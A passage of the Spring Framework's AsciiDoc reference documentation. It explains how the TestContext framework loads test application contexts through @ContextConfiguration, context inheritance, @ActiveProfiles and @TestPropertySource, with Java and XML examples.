example:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration\n\tpublic class MyTest {\n\n\t\t**@Autowired**\n\t\tprivate ApplicationContext applicationContext;\n\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, if your test is configured to load a `WebApplicationContext`, you can inject\nthe web application context into your test as follows:\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@WebAppConfiguration**\n\t@ContextConfiguration\n\tpublic class MyWebAppTest {\n\t\t**@Autowired**\n\t\tprivate WebApplicationContext wac;\n\n\t\t\/\/ class body...\n\t}\n----\n\nDependency injection via `@Autowired` is provided by the\n`DependencyInjectionTestExecutionListener` which is configured by default (see\n<<testcontext-fixture-di>>).\n====\n\nTest classes that use the TestContext framework do not need to extend any particular\nclass or implement a specific interface to configure their application context. Instead,\nconfiguration is achieved simply by declaring the `@ContextConfiguration` annotation at\nthe class level. If your test class does not explicitly declare application context\nresource `locations` or annotated `classes`, the configured `ContextLoader` determines\nhow to load a context from a default location or default configuration classes. In\naddition to context resource `locations` and annotated `classes`, an application context\ncan also be configured via application context `initializers`.\n\nThe following sections explain how to configure an `ApplicationContext` via XML\nconfiguration files, Groovy scripts, annotated classes (typically `@Configuration`\nclasses), or context initializers using Spring's `@ContextConfiguration` annotation.\nAlternatively, you can implement and configure your own custom `SmartContextLoader` for\nadvanced use cases.\n\n[[testcontext-ctx-management-xml]]\n===== Context configuration with XML resources\n\nTo load an `ApplicationContext` for your tests using XML configuration files, annotate\nyour test class with `@ContextConfiguration` and configure the `locations` attribute with\nan array that contains the resource locations of XML configuration metadata. A plain or\nrelative path -- for example `\"context.xml\"` -- will be treated as a classpath resource\nthat is relative to the package in which the test class is defined. A path starting with\na slash is treated as an absolute classpath location, for example\n`\"\/org\/example\/config.xml\"`. A path which represents a resource URL (i.e., a path\nprefixed with `classpath:`, `file:`, `http:`, etc.) will be used __as is__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/app-config.xml\" and\n\t\/\/ \"\/test-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(locations={\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n`@ContextConfiguration` supports an alias for the `locations` attribute through the\nstandard Java `value` attribute. Thus, if you do not need to declare additional\nattributes in `@ContextConfiguration`, you can omit the declaration of the `locations`\nattribute name and declare the resource locations by using the shorthand format\ndemonstrated in the following example.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t**@ContextConfiguration({\"\/app-config.xml\", \"\/test-config.xml\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default XML resource\nlocation. Specifically, `GenericXmlContextLoader` and `GenericXmlWebContextLoader` detect\na default location based on the name of the test class. If your class is named\n`com.example.MyTest`, `GenericXmlContextLoader` loads your application context from\n`\"classpath:com\/example\/MyTest-context.xml\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTest-context.xml\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-groovy]]\n===== Context configuration with Groovy scripts\n\nTo load an `ApplicationContext` for your tests using Groovy scripts that utilize the\n<<groovy-bean-definition-dsl,Groovy Bean Definition DSL>>, annotate your test class with\n`@ContextConfiguration` and configure the `locations` or `value` attribute with an array\nthat contains the resource locations of Groovy scripts. Resource lookup semantics for\nGroovy scripts are the same as those described for <<testcontext-ctx-management-xml,XML\nconfiguration files>>.\n\n\n.Enabling Groovy script support\n[TIP]\n====\nSupport for using Groovy scripts to load an `ApplicationContext` in the Spring\nTestContext Framework is enabled automatically if Groovy is on the classpath.\n====\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/AppConfig.groovy\" and\n\t\/\/ \"\/TestConfig.groovy\" in the root of the classpath\n\t**@ContextConfiguration({\"\/AppConfig.groovy\", \"\/TestConfig.Groovy\"})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIf you omit both the `locations` and `value` attributes from the `@ContextConfiguration`\nannotation, the TestContext framework will attempt to detect a default Groovy script.\nSpecifically, `GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader`\ndetect a default location based on the name of the test class. If your class is named\n`com.example.MyTest`, the Groovy context loader will load your application context from\n`\"classpath:com\/example\/MyTestContext.groovy\"`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.example;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"classpath:com\/example\/MyTestContext.groovy\"\n\t**@ContextConfiguration**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Declaring XML config and Groovy scripts simultaneously\n[TIP]\n====\nBoth XML configuration files and Groovy scripts can be declared simultaneously via the\n`locations` or `value` attribute of `@ContextConfiguration`. If the path to a configured\nresource location ends with `.xml` it will be loaded using an `XmlBeanDefinitionReader`;\notherwise it will be loaded using a `GroovyBeanDefinitionReader`.\n\nThe following listing demonstrates how to combine both in an integration test.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from\n\t\/\/ \"\/app-config.xml\" and \"\/TestConfig.groovy\"\n\t@ContextConfiguration({ \"\/app-config.xml\", \"\/TestConfig.groovy\" })\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n====\n\n[[testcontext-ctx-management-javaconfig]]\n===== Context configuration with annotated classes\n\nTo load an `ApplicationContext` for your tests using __annotated classes__ (see\n<<beans-java>>), annotate your test class with `@ContextConfiguration` and configure the\n`classes` attribute with an array that contains references to annotated classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from AppConfig and TestConfig\n\t**@ContextConfiguration(classes = {AppConfig.class, TestConfig.class})**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n.Annotated Classes\n[TIP]\n====\nThe term __annotated class__ can refer to any of the following.\n\n* A class annotated with `@Configuration`\n* A component (i.e., a class annotated with `@Component`, `@Service`, `@Repository`, etc.)\n* A JSR-330 compliant class that is annotated with `javax.inject` annotations\n* Any other class that contains `@Bean`-methods\n\nConsult the javadocs of `@Configuration` and `@Bean` for further information regarding\nthe configuration and semantics of __annotated classes__, paying special attention to\nthe discussion of __`@Bean` Lite Mode__.\n====\n\nIf you omit the `classes` attribute from the `@ContextConfiguration` annotation, the\nTestContext framework will attempt to detect the presence of default configuration\nclasses. Specifically, `AnnotationConfigContextLoader` and\n`AnnotationConfigWebContextLoader` will detect all `static` nested classes of the test class\nthat meet the requirements for configuration class implementations as specified in the\n`@Configuration` javadocs. In the following example, the `OrderServiceTest` class\ndeclares a `static` nested configuration class named `Config` that will be automatically\nused to load the `ApplicationContext` for the test class. Note that the name of the\nconfiguration class is arbitrary. In addition, a test class can contain more than one\n`static` nested configuration class if desired.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from the\n\t\/\/ static nested Config class\n\t**@ContextConfiguration**\n\tpublic class OrderServiceTest {\n\n\t\t@Configuration\n\t\tstatic class Config {\n\n\t\t\t\/\/ this bean will be injected into the OrderServiceTest class\n\t\t\t@Bean\n\t\t\tpublic OrderService orderService() {\n\t\t\t\tOrderService orderService = new OrderServiceImpl();\n\t\t\t\t\/\/ set properties, etc.\n\t\t\t\treturn orderService;\n\t\t\t}\n\t\t}\n\n\t\t@Autowired\n\t\tprivate OrderService orderService;\n\n\t\t@Test\n\t\tpublic void testOrderService() {\n\t\t\t\/\/ test the orderService\n\t\t}\n\n\t}\n----\n\n[[testcontext-ctx-management-mixed-config]]\n===== Mixing XML, Groovy scripts, and annotated classes\n\nIt may sometimes be desirable to mix XML configuration files, Groovy scripts, and\nannotated classes (i.e., typically `@Configuration` classes) to configure an\n`ApplicationContext` for your tests. For example, if you use XML configuration in\nproduction, you may decide that you want to use `@Configuration` classes to configure\nspecific Spring-managed components for your tests, or vice versa.\n\nFurthermore, some third-party frameworks (like Spring Boot) provide first-class support\nfor loading an `ApplicationContext` from different types of resources simultaneously\n(e.g., XML configuration files, Groovy scripts, and `@Configuration` classes). The Spring\nFramework historically has not supported this for standard deployments. Consequently,\nmost of the `SmartContextLoader` implementations that the Spring Framework delivers in\nthe `spring-test` module support only one resource type per test context; however, this\ndoes not mean that you cannot use both. One exception to the general rule is that the\n`GenericGroovyXmlContextLoader` and `GenericGroovyXmlWebContextLoader` support both XML\nconfiguration files and Groovy scripts simultaneously. Furthermore, third-party\nframeworks may choose to support the declaration of both `locations` and `classes` via\n`@ContextConfiguration`, and with the standard testing support in the TestContext\nframework, you have the following options.\n\nIf you want to use resource locations (e.g., XML or Groovy) __and__ `@Configuration`\nclasses to configure your tests, you will have to pick one as the __entry point__, and\nthat one will have to include or import the other. For example, in XML or Groovy scripts\nyou can include `@Configuration` classes via component scanning or define them as normal\nSpring beans; whereas, in a `@Configuration` class you can use `@ImportResource` to\nimport XML configuration files or Groovy scripts. Note that this behavior is semantically\nequivalent to how you configure your application in production: in production\nconfiguration you will define either a set of XML or Groovy resource locations or a set\nof `@Configuration` classes that your production `ApplicationContext` will be loaded\nfrom, but you still have the freedom to include or import the other type of configuration.\n\n[[testcontext-ctx-management-initializers]]\n===== Context configuration with context initializers\nTo configure an `ApplicationContext` for your tests using context initializers, annotate\nyour test class with `@ContextConfiguration` and configure the `initializers` attribute\nwith an array that contains references to classes that implement\n`ApplicationContextInitializer`. The declared context initializers will then be used to\ninitialize the `ConfigurableApplicationContext` that is loaded for your tests. Note that\nthe concrete `ConfigurableApplicationContext` type supported by each declared\ninitializer must be compatible with the type of `ApplicationContext` created by the\n`SmartContextLoader` in use (i.e., typically a `GenericApplicationContext`).\nFurthermore, the order in which the initializers are invoked depends on whether they\nimplement Spring's `Ordered` interface or are annotated with Spring's `@Order` annotation\nor the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from TestConfig\n\t\/\/ and initialized by TestAppCtxInitializer\n\t**@ContextConfiguration(\n\t\tclasses = TestConfig.class,\n\t\tinitializers = TestAppCtxInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIt is also possible to omit the declaration of XML configuration files, Groovy scripts,\nor annotated classes in `@ContextConfiguration` entirely and instead declare only\n`ApplicationContextInitializer` classes which are then responsible for registering beans\nin the context -- for example, by programmatically loading bean definitions from XML\nfiles or configuration classes.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by EntireAppInitializer\n\t\/\/ which presumably registers beans in the context\n\t**@ContextConfiguration(initializers = EntireAppInitializer.class)**\n\tpublic class MyTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-inheritance]]\n===== Context configuration inheritance\n`@ContextConfiguration` supports boolean `inheritLocations` and `inheritInitializers`\nattributes that denote whether resource locations or annotated classes and context\ninitializers declared by superclasses should be __inherited__. The default value for\nboth flags is `true`. This means that a test class inherits the resource locations or\nannotated classes as well as the context initializers declared by any superclasses.\nSpecifically, the resource locations or annotated classes for a test class are appended\nto the list of resource locations or annotated classes declared by superclasses.\nSimilarly, the initializers for a given test class will be added to the set of\ninitializers defined by test superclasses. Thus, subclasses have the option\nof __extending__ the resource locations, annotated classes, or context initializers.\n\nIf the `inheritLocations` or `inheritInitializers` attribute in `@ContextConfiguration`\nis set to `false`, the resource locations or annotated classes and the context\ninitializers, respectively, for the test class __shadow__ and effectively replace the\nconfiguration defined by superclasses.\n\nIn the following example that uses XML resource locations, the `ApplicationContext` for\n`ExtendedTest` will be loaded from __\"base-config.xml\"__ __and__\n__\"extended-config.xml\"__, in that order. Beans defined in __\"extended-config.xml\"__ may\ntherefore __override__ (i.e., replace) those defined in __\"base-config.xml\"__.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\"\n\t\/\/ in the root of the classpath\n\t**@ContextConfiguration(\"\/base-config.xml\")**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from \"\/base-config.xml\" and\n\t\/\/ \"\/extended-config.xml\" in the root of the classpath\n\t**@ContextConfiguration(\"\/extended-config.xml\")**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nSimilarly, in the following example that uses annotated classes, the\n`ApplicationContext` for `ExtendedTest` will be loaded from the `BaseConfig` __and__\n`ExtendedConfig` classes, in that order. Beans defined in `ExtendedConfig` may therefore\noverride (i.e., replace) those defined in `BaseConfig`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from BaseConfig\n\t**@ContextConfiguration(classes = BaseConfig.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be loaded from BaseConfig and ExtendedConfig\n\t**@ContextConfiguration(classes = ExtendedConfig.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\nIn the following example that uses context initializers, the `ApplicationContext` for\n`ExtendedTest` will be initialized using `BaseInitializer` __and__\n`ExtendedInitializer`. Note, however, that the order in which the initializers are\ninvoked depends on whether they implement Spring's `Ordered` interface or are annotated\nwith Spring's `@Order` annotation or the standard `@Priority` annotation.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t**@ContextConfiguration(initializers = BaseInitializer.class)**\n\tpublic class BaseTest {\n\t\t\/\/ class body...\n\t}\n\n\t\/\/ ApplicationContext will be initialized by BaseInitializer\n\t\/\/ and ExtendedInitializer\n\t**@ContextConfiguration(initializers = ExtendedInitializer.class)**\n\tpublic class ExtendedTest extends BaseTest {\n\t\t\/\/ class body...\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles]]\n===== Context configuration with environment profiles\nSpring 3.1 introduced first-class support in the framework for the notion of\nenvironments and profiles (a.k.a., __bean definition profiles__), and integration tests\ncan be configured to activate particular bean definition profiles for various testing\nscenarios. This is achieved by annotating a test class with the `@ActiveProfiles`\nannotation and supplying a list of profiles that should be activated when loading the\n`ApplicationContext` for the test.\n\n[NOTE]\n====\n`@ActiveProfiles` may be used with any implementation of the new `SmartContextLoader`\nSPI, but `@ActiveProfiles` is not supported with implementations of the older\n`ContextLoader` SPI.\n====\n\nLet's take a look at some examples with XML configuration and `@Configuration` classes.\n\n[source,xml,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t<!-- app-config.xml -->\n\t<beans xmlns=\"http:\/\/www.springframework.org\/schema\/beans\"\n\t\txmlns:xsi=\"http:\/\/www.w3.org\/2001\/XMLSchema-instance\"\n\t\txmlns:jdbc=\"http:\/\/www.springframework.org\/schema\/jdbc\"\n\t\txmlns:jee=\"http:\/\/www.springframework.org\/schema\/jee\"\n\t\txsi:schemaLocation=\"...\">\n\n\t\t<bean id=\"transferService\"\n\t\t\t\tclass=\"com.bank.service.internal.DefaultTransferService\">\n\t\t\t<constructor-arg ref=\"accountRepository\"\/>\n\t\t\t<constructor-arg ref=\"feePolicy\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"accountRepository\"\n\t\t\t\tclass=\"com.bank.repository.internal.JdbcAccountRepository\">\n\t\t\t<constructor-arg ref=\"dataSource\"\/>\n\t\t<\/bean>\n\n\t\t<bean id=\"feePolicy\"\n\t\t\tclass=\"com.bank.service.internal.ZeroFeePolicy\"\/>\n\n\t\t<beans profile=\"dev\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/test-data.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t\t<beans profile=\"production\">\n\t\t\t<jee:jndi-lookup id=\"dataSource\" jndi-name=\"java:comp\/env\/jdbc\/datasource\"\/>\n\t\t<\/beans>\n\n\t\t<beans profile=\"default\">\n\t\t\t<jdbc:embedded-database id=\"dataSource\">\n\t\t\t\t<jdbc:script\n\t\t\t\t\tlocation=\"classpath:com\/bank\/config\/sql\/schema.sql\"\/>\n\t\t\t<\/jdbc:embedded-database>\n\t\t<\/beans>\n\n\t<\/beans>\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t\/\/ ApplicationContext will be loaded from \"classpath:\/app-config.xml\"\n\t@ContextConfiguration(\"\/app-config.xml\")\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nWhen `TransferServiceTest` is run, its `ApplicationContext` will be loaded from the\n`app-config.xml` configuration file in the root of the classpath. If you inspect\n`app-config.xml` you'll notice that the `accountRepository` bean has a dependency on a\n`dataSource` bean; however, `dataSource` is not defined as a top-level bean. Instead,\n`dataSource` is defined three times: in the __production__ profile, the\n__dev__ profile, and the __default__ profile.\n\nBy annotating `TransferServiceTest` with `@ActiveProfiles(\"dev\")` we instruct the Spring\nTestContext Framework to load the `ApplicationContext` with the active profiles set to\n`{\"dev\"}`. As a result, an embedded database will be created and populated with test data,\nand the `accountRepository` bean will be wired with a reference to the development\n`DataSource`. And that's likely what we want in an integration test.\n\nIt is sometimes useful to assign beans to a `default` profile. Beans within the default profile\nare only included when no other profile is specifically activated. This can be used to define\n_fallback_ beans to be used in the application's default state. For example, you may\nexplicitly provide a data source for `dev` and `production` profiles, but define an in-memory\ndata source as a default when neither of these is active.\n\nThe following code listings demonstrate how to implement the same configuration and\nintegration test but using `@Configuration` classes instead of XML.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"dev\")\n\tpublic class StandaloneDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/test-data.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"production\")\n\tpublic class JndiDataConfig {\n\n\t\t@Bean(destroyMethod=\"\")\n\t\tpublic DataSource dataSource() throws Exception {\n\t\t\tContext ctx = new InitialContext();\n\t\t\treturn (DataSource) ctx.lookup(\"java:comp\/env\/jdbc\/datasource\");\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\t@Profile(\"default\")\n\tpublic class DefaultDataConfig {\n\n\t\t@Bean\n\t\tpublic DataSource dataSource() {\n\t\t\treturn new EmbeddedDatabaseBuilder()\n\t\t\t\t.setType(EmbeddedDatabaseType.HSQL)\n\t\t\t\t.addScript(\"classpath:com\/bank\/config\/sql\/schema.sql\")\n\t\t\t\t.build();\n\t\t}\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@Configuration\n\tpublic class TransferServiceConfig {\n\n\t\t@Autowired DataSource dataSource;\n\n\t\t@Bean\n\t\tpublic TransferService transferService() {\n\t\t\treturn new DefaultTransferService(accountRepository(), feePolicy());\n\t\t}\n\n\t\t@Bean\n\t\tpublic AccountRepository accountRepository() {\n\t\t\treturn new JdbcAccountRepository(dataSource);\n\t\t}\n\n\t\t@Bean\n\t\tpublic FeePolicy feePolicy() {\n\t\t\treturn new ZeroFeePolicy();\n\t\t}\n\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic class TransferServiceTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\nIn this variation, we have split the XML configuration into four independent\n`@Configuration` classes:\n\n* `TransferServiceConfig`: acquires a `dataSource` via dependency injection using\n `@Autowired`\n* `StandaloneDataConfig`: defines a `dataSource` for an embedded database suitable for\n developer tests\n* `JndiDataConfig`: defines a `dataSource` that is retrieved from JNDI in a production\n environment\n* `DefaultDataConfig`: defines a `dataSource` for a default embedded database in case\n no profile is active\n\nAs with the XML-based configuration example, we still annotate `TransferServiceTest`\nwith `@ActiveProfiles(\"dev\")`, but this time we specify all four configuration classes\nvia the `@ContextConfiguration` annotation. The body of the test class itself remains\ncompletely unchanged.\n\nIt is often the case that a single set of profiles is used across multiple test classes\nwithin a given project. Thus, to avoid duplicate declarations of the `@ActiveProfiles`\nannotation it is possible to declare `@ActiveProfiles` once on a base class, and\nsubclasses will automatically inherit the `@ActiveProfiles` configuration from the base\nclass. In the following example, the declaration of `@ActiveProfiles` (as well as other\nannotations) has been moved to an abstract superclass, `AbstractIntegrationTest`.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t@RunWith(SpringRunner.class)\n\t@ContextConfiguration(classes = {\n\t\t\tTransferServiceConfig.class,\n\t\t\tStandaloneDataConfig.class,\n\t\t\tJndiDataConfig.class,\n\t\t\tDefaultDataConfig.class})\n\t@ActiveProfiles(\"dev\")\n\tpublic abstract class AbstractIntegrationTest {\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile inherited from superclass\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\n\t\t@Autowired\n\t\tprivate TransferService transferService;\n\n\t\t@Test\n\t\tpublic void testTransferService() {\n\t\t\t\/\/ test the transferService\n\t\t}\n\t}\n----\n\n`@ActiveProfiles` also supports an `inheritProfiles` attribute that can be used to\ndisable the inheritance of active profiles.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden with \"production\"\n\t@ActiveProfiles(profiles = \"production\", inheritProfiles = false)\n\tpublic class ProductionTransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[[testcontext-ctx-management-env-profiles-ActiveProfilesResolver]]\nFurthermore, it is sometimes necessary to resolve active profiles for tests\n__programmatically__ instead of declaratively -- for example, based on:\n\n* the current operating system\n* whether tests are being executed on a continuous integration build server\n* the presence of certain environment variables\n* the presence of custom class-level annotations\n* etc.\n\nTo resolve active bean definition profiles programmatically, simply implement a custom\n`ActiveProfilesResolver` and register it via the `resolver` attribute of\n`@ActiveProfiles`. The following example demonstrates how to implement and register a\ncustom `OperatingSystemActiveProfilesResolver`. For further information, refer to the\ncorresponding javadocs.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service;\n\n\t\/\/ \"dev\" profile overridden programmatically via a custom resolver\n\t@ActiveProfiles(\n\t\tresolver = OperatingSystemActiveProfilesResolver.class,\n\t\tinheritProfiles = false)\n\tpublic class TransferServiceTest extends AbstractIntegrationTest {\n\t\t\/\/ test body\n\t}\n----\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\tpackage com.bank.service.test;\n\n\tpublic class OperatingSystemActiveProfilesResolver implements ActiveProfilesResolver {\n\n\t\t@Override\n\t\tString[] resolve(Class<?> testClass) {\n\t\t\tString profile = ...;\n\t\t\t\/\/ determine the value of profile based on the operating system\n\t\t\treturn new String[] {profile};\n\t\t}\n\t}\n----\n\n[[testcontext-ctx-management-property-sources]]\n===== Context configuration with test property sources\n\nSpring 3.1 introduced first-class support in the framework for the notion of an\nenvironment with a hierarchy of _property sources_, and since Spring 4.1 integration\ntests can be configured with test-specific property sources. In contrast to the\n`@PropertySource` annotation used on `@Configuration` classes, the `@TestPropertySource`\nannotation can be declared on a test class to declare resource locations for test\nproperties files or _inlined_ properties. These test property sources will be added to\nthe set of `PropertySources` in the `Environment` for the `ApplicationContext` loaded\nfor the annotated integration test.\n\n[NOTE]\n====\n`@TestPropertySource` may be used with any implementation of the `SmartContextLoader`\nSPI, but `@TestPropertySource` is not supported with implementations of the older\n`ContextLoader` SPI.\n\nImplementations of `SmartContextLoader` gain access to merged test property source values\nvia the `getPropertySourceLocations()` and `getPropertySourceProperties()` methods in\n`MergedContextConfiguration`.\n====\n\n*Declaring test property sources*\n\nTest properties files can be configured via the `locations` or `value` attribute of\n`@TestPropertySource` as shown in the following example.\n\nBoth traditional and XML-based properties file formats are supported -- for example,\n`\"classpath:\/com\/example\/test.properties\"` or `\"file:\/\/\/path\/to\/file.xml\"`.\n\nEach path will be interpreted as a Spring `Resource`. A plain path -- for example,\n`\"test.properties\"` -- will be treated as a classpath resource that is _relative_ to the\npackage in which the test class is defined. A path starting with a slash will be treated\nas an _absolute_ classpath resource, for example: `\"\/org\/example\/test.xml\"`. A path which\nreferences a URL (e.g., a path prefixed with `classpath:`, `file:`, `http:`, etc.) will\nbe loaded using the specified resource protocol. Resource location wildcards (e.g.\n`**\/*.properties`) are not permitted: each location must evaluate to exactly one\n`.properties` or `.xml` resource.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\"\/test.properties\")\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n_Inlined_ properties in the form of key-value pairs can be configured via the\n`properties` attribute of `@TestPropertySource` as shown in the following example. All\nkey-value pairs will be added to the enclosing `Environment` as a single test\n`PropertySource` with the highest precedence.\n\nThe supported syntax for key-value pairs is the same as the syntax defined for entries in\na Java properties file:\n\n* `\"key=value\"`\n* `\"key:value\"`\n* `\"key value\"`\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(properties = {\"timezone = GMT\", \"port: 4242\"})\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Default properties file detection*\n\nIf `@TestPropertySource` is declared as an empty annotation (i.e., without explicit\nvalues for the `locations` or `properties` attributes), an attempt will be made to detect\na _default_ properties file relative to the class that declared the annotation. For\nexample, if the annotated test class is `com.example.MyTest`, the corresponding default\nproperties file is `\"classpath:com\/example\/MyTest.properties\"`. If the default cannot be\ndetected, an `IllegalStateException` will be thrown.\n\n*Precedence*\n\nTest property sources have higher precedence than those loaded from the operating\nsystem's environment or Java system properties as well as property sources added by the\napplication declaratively via `@PropertySource` or programmatically. Thus, test property\nsources can be used to selectively override properties defined in system and application\nproperty sources. Furthermore, inlined properties have higher precedence than properties\nloaded from resource locations.\n\nIn the following example, the `timezone` and `port` properties as well as any properties\ndefined in `\"\/test.properties\"` will override any properties of the same name that are\ndefined in system and application property sources. Furthermore, if the\n`\"\/test.properties\"` file defines entries for the `timezone` and `port` properties those\nwill be overridden by the _inlined_ properties declared via the `properties` attribute.\n\n[source,java,indent=0]\n[subs=\"verbatim,quotes\"]\n----\n\t@ContextConfiguration\n\t@TestPropertySource(\n\t\tlocations = \"\/test.properties\",\n\t\tproperties = {\"timezone = GMT\", \"port: 4242\"}\n\t)\n\tpublic class MyIntegrationTests {\n\t\t\/\/ class body...\n\t}\n----\n\n*Inheriting and overriding test property sources*\n\n`@TestPropertySource` supports boolean `inheritLocations` and `inheritProperties`\nattributes that denote whether resource locations for properties files and inlined\nproperties declared by superclasses should be __inherited__. The default value for both\nflags is `true`. This means that a test class inherits the locations and inlined\nproperties declared by any superclasses. Specifically, the locations and inlined\nproperties for a test class are appended to the locations and inlined properties declared\nby superclasses. Thus, subclasses have the option of __extending__ the locations and\ninlined properties. Note that properties that appear later will __shadow__ (i.e..,\noverride) properties of the same name that appear earlier. In addition, the\naforementioned precedence rules apply for inherited test property sources as well.\n\nIf the `inheritLocations` or `inheritProperties` attribute in `@TestPropertySource` is set\nto `false`, the locations or inlined properties, respectively, for the test class 